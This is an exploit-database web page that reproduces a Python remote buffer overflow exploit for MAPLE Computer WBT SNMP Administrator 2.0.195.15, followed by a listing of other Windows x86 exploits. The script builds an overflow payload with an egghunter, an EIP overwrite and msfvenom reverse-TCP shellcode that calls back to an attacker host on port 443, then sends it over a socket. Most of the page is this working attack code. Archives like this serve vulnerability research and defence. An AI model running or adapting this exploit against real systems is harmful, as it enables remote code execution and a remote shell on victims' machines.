Menu

Search for hundreds of thousands of exploits

"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)"

Author

sasaga92

Platform

windows_x86

Release date

2019-07-19

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)  


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



def pattern_create(_type,_length):
  _type = _type.split(" ")

  if _type[0] == "trash":
    return _type[1] * _length
  elif _type[0] == "random":
    return ''.join(random.choice(string.lowercase) for i in range(_length))
  elif _type[0] == "pattern":
    _pattern = ''
    _parts = ['A', 'a', '0']
    while len(_pattern) != _length:
      _pattern += _parts[len(_pattern) % 3]
      if len(_pattern) % 3 == 0:
        _parts[2] = chr(ord(_parts[2]) + 1)
        if _parts[2] > '9':
          _parts[2] = '0'
          _parts[1] = chr(ord(_parts[1]) + 1)
          if _parts[1] > 'z':
            _parts[1] = 'a'
            _parts[0] = chr(ord(_parts[0]) + 1)
            if _parts[0] > 'Z':
              _parts[0] = 'A'
    return _pattern
  else:
    return "Not Found"

def pwned(_host, _port, _payload):
  print "[*] Conectandose a {0}:{1}...".format(_host, _port)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((_host, _port))
  print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
  _payload = "{0}\r\n\r\n".format(_payload)
  s.send(_payload)
  _data = s.recv(1024)
  s.shutdown
  s.close
  print 'Recibido:', repr(_data)
  print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))


def main():

  _host = "192.168.0.12"
  _port = 987
  _offset_eip = 642200
  _padding = 642144
  _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
  _tag = "w00tw00t"

  #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
  _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
    "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
    "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
    "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
    "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
    "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
    "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
    "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
    "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
    "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
    "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
    "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
    "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
    "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
    "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
    "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
    "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
    "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
    "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
    "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
    "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
    "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
    "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
    "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
    "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
    "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
    "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
    "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
    "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
    "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
    "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
    "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
    "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
    "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
    "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
    "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
    "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
    "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
    "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
    "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
    "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
    "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
    "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
    "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
    "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
    "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
    "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
    "\x70\x73\x63\x69\x6f\x59\x45\x41\x41")

  _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
 
  _inject =  pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
  _inject += _tag
  _inject += _shellcode
  _inject += _egghunter
  _inject +=  pattern_create("trash B", _offset_eip-len(_inject))
  _inject += _eip
  
  print(_inject)
  pwned(_host,_port,_inject)

if __name__ == "__main__":
    main()
Release Date Title Type Platform Author
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
2019-05-08 "Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)" remote windows_x86 Metasploit
2019-01-02 "Ayukov NFTP FTP Client 2.0 - Buffer Overflow" local windows_x86 "Uday Mittal"
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "ShareAlarmPro 2.1.4 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "NetShareWatcher 1.5.8 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-27 "Product Key Explorer 4.0.9 - Denial of Service (PoC)" dos windows_x86 T3jv1l
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-09 "Textpad 8.1.2 - Denial Of Service (PoC)" dos windows_x86 "Gionathan Reale"
2018-11-26 "Arm Whois 3.11 - Buffer Overflow (ASLR)" local windows_x86 zephyr
2018-11-19 "HTML Video Player 1.2.5 - Buffer-Overflow (SEH)" local windows_x86 "Kağan Çapar"
2018-11-06 "Arm Whois 3.11 - Buffer Overflow (SEH)" local windows_x86 "Semen Alexandrovich Lyhin"
2018-08-29 "Argus Surveillance DVR 4.0.0.0 - Directory Traversal" webapps windows_x86 hyp3rlinx
2010-09-27 "Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting" webapps windows_x86 **RoAd_KiLlEr**
2010-09-24 "Traidnt UP - Cross-Site Request Forgery (Add Admin)" webapps windows_x86 "John Johnz"
2010-09-24 "Joomla! Component Elite Experts - SQL Injection" webapps windows_x86 **RoAd_KiLlEr**
2010-08-12 "PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion" webapps windows_x86 LoSt.HaCkEr
2018-08-20 "SEIG Modbus 3.4 - Remote Code Execution" remote windows_x86 "Alejandro Parodi"
2018-08-19 "SEIG SCADA System 9 - Remote Code Execution" remote windows_x86 "Alejandro Parodi"
2017-10-17 "Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)" remote windows_x86 mschenk
2016-04-25 "PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit)" remote windows_x86 "Jonathan Smith"
2015-11-02 "Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution" remote windows_x86 "Tomislav Paskalev"
2015-08-18 "Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "CA CAM (Windows x86) - 'log_security()' Remote Stack Buffer Overflow (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)" remote windows_x86 Metasploit
2010-09-20 "McAfee ePolicy Orchestrator / ProtectionPilot - Remote Overflow (Metasploit)" remote windows_x86 Metasploit
2010-07-07 "Apache (Windows x86) - Chunked Encoding (Metasploit)" remote windows_x86 Metasploit
Release Date Title Type Platform Author
2019-07-19 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)" remote windows_x86 sasaga92
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47137/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47137/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47137/41520/maple-computer-wbt-snmp-administrator-2019515-remote-buffer-overflow-egghunter/download/", "exploit_id": "47137", "exploit_description": "\"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)\"", "exploit_date": "2019-07-19", "exploit_author": "sasaga92", "exploit_type": "remote", "exploit_platform": "windows_x86", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse